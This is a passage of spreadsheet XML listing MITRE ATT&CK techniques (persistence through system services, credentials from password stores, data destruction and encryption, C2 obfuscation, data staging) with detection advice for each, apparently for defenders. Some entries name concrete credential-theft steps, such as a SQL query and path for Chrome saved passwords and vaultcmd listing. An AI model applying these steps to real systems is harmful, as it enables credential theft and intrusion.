Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Agent</t>
  </si>
  <si>
    <t>Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>17 January 2020</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Daemon</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). 
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories  (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. 
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Create or Modify System Process: Systemd Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). 
Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.
An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Pedro Harrison; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>12 February 2020</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Keychain</t>
  </si>
  <si>
    <t>Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>17 February 2020</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Password Managers</t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Securityd Memory</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Windows Credential Manager</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted &lt;code&gt;.vcrd&lt;/code&gt; files, located under &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as &lt;code&gt;CredEnumerateA&lt;/code&gt; to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>15 March 2021</t>
  </si>
  <si>
    <t>Monitor process and command-line parameters of &lt;code&gt;vaultcmd.exe&lt;/code&gt; for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., &lt;code&gt;vaulcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Bernaldo Penas Antelo; Mugdha Peter Bansode</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</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</si>
  <si>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drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional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2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>14 March 2019</t>
  </si>
  <si>
    <t>25 March 2021</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.
In cloud environments, the occurrence of anomalous high-volume deletion events, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;, within a short period of time may indicate suspicious activity.</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee; Varonis Threat Labs</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</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</si>
  <si>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systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>14 March 2020</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1132.001</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</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</si>
  <si>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transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>15 March 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.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</si>
  <si>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https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>02 March 2020</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data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</si>
  <si>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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Data Manipulation: Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect.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 </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Data Obfuscation: Junk Data</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Data Obfuscation: Protocol Impersonation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/003</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Data Obfuscation: Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory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location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
